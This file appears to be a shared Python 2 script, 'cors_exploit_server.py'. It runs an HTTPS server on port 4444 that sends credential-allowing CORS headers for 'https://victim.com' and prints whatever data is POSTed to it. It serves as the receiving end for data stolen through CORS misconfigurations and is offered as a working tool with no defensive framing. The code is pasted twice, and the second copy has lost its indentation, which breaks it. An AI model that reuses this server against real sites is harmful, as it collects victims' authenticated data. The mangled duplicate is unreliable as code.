ricardojba/cors_exploit_server.py

## cors_exploit_server.py
#!/usr/bin/env python
from sys import argv
import BaseHTTPServer
import ssl

class CORSHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):

    def do_OPTIONS(self):
        self.send_response(200, "ok")
        #self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Origin', 'https://victim.com')
        self.send_header('Access-Control-Allow-Credentials', 'true')
        self.send_header('Access-Control-Allow-Methods', 'GET,POST,OPTIONS,PUT,PATCH,DELETE')
        self.send_header('Access-Control-Allow-Headers', 'Api-Key,Origin,Content-Type,Accept,Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Accept')
        self.end_headers()
        self.wfile.write("<html><body><h1>Hello!</h1></body></html>")

    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        self.send_response(200)
        #self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Origin', 'https://victim.com')
        self.send_header('Access-Control-Allow-Credentials', 'true')
        self.send_header('Access-Control-Allow-Methods', 'GET,POST,OPTIONS,PUT,PATCH,DELETE')
        self.send_header('Access-Control-Allow-Headers', 'Api-Key,Origin,Content-Type,Accept,Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Accept')
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        print post_data
        self.wfile.write('<html><body><h1>Hello!</h1><pre>' + post_data + '</pre></body></html>')

    def do_GET(self):
        self.send_response(200)
        #self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Origin', 'https://victim.com')
        self.send_header('Access-Control-Allow-Credentials', 'true')
        self.send_header('Access-Control-Allow-Methods', 'GET,POST,OPTIONS,PUT,PATCH,DELETE')
        self.send_header('Access-Control-Allow-Headers', 'Api-Key,Origin,Content-Type,Accept,Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Accept')
        self.send_header('Content-type', 'text/html')
        self.end_headers()
        self.wfile.write('<html><body><h1>Hello!</h1></body></html>')

if __name__ == "__main__":

    if len(argv) == 2:
        PORT = int(argv[1])
    else:
        PORT = 4444

    Handler = CORSHTTPRequestHandler

    httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', PORT), Handler)

    httpd.socket = ssl.wrap_socket (httpd.socket,
        keyfile='/etc/letsencrypt/live/foo.com/privkey.pem',
        certfile='/etc/letsencrypt/live/foo.com/cert.pem', server_side=True)
    print "serving at port %s" % PORT
    httpd.serve_forever()
	#!/usr/bin/env python
	from sys import argv
	import BaseHTTPServer
	import ssl

	class CORSHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):

	def do_OPTIONS(self):
	self.send_response(200, "ok")
	#self.send_header('Access-Control-Allow-Origin', '*')
	self.send_header('Access-Control-Allow-Origin', 'https://victim.com')
	self.send_header('Access-Control-Allow-Credentials', 'true')
	self.send_header('Access-Control-Allow-Methods', 'GET,POST,OPTIONS,PUT,PATCH,DELETE')
	self.send_header('Access-Control-Allow-Headers', 'Api-Key,Origin,Content-Type,Accept,Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Accept')
	self.end_headers()
	self.wfile.write("<html><body><h1>Hello!</h1></body></html>")

	def do_POST(self):
	content_length = int(self.headers['Content-Length'])
	post_data = self.rfile.read(content_length)
	self.send_response(200)
	#self.send_header('Access-Control-Allow-Origin', '*')
	self.send_header('Access-Control-Allow-Origin', 'https://victim.com')
	self.send_header('Access-Control-Allow-Credentials', 'true')
	self.send_header('Access-Control-Allow-Methods', 'GET,POST,OPTIONS,PUT,PATCH,DELETE')
	self.send_header('Access-Control-Allow-Headers', 'Api-Key,Origin,Content-Type,Accept,Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Accept')
	self.send_header('Content-type', 'text/html')
	self.end_headers()
	print post_data
	self.wfile.write('<html><body><h1>Hello!</h1><pre>' + post_data + '</pre></body></html>')

	def do_GET(self):
	self.send_response(200)
	#self.send_header('Access-Control-Allow-Origin', '*')
	self.send_header('Access-Control-Allow-Origin', 'https://victim.com')
	self.send_header('Access-Control-Allow-Credentials', 'true')
	self.send_header('Access-Control-Allow-Methods', 'GET,POST,OPTIONS,PUT,PATCH,DELETE')
	self.send_header('Access-Control-Allow-Headers', 'Api-Key,Origin,Content-Type,Accept,Authorization,DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Accept')
	self.send_header('Content-type', 'text/html')
	self.end_headers()
	self.wfile.write('<html><body><h1>Hello!</h1></body></html>')

	if __name__ == "__main__":

	if len(argv) == 2:
	PORT = int(argv[1])
	else:
	PORT = 4444

	Handler = CORSHTTPRequestHandler

	httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', PORT), Handler)

	httpd.socket = ssl.wrap_socket (httpd.socket,
	keyfile='/etc/letsencrypt/live/foo.com/privkey.pem',
	certfile='/etc/letsencrypt/live/foo.com/cert.pem', server_side=True)
	print "serving at port %s" % PORT
	httpd.serve_forever()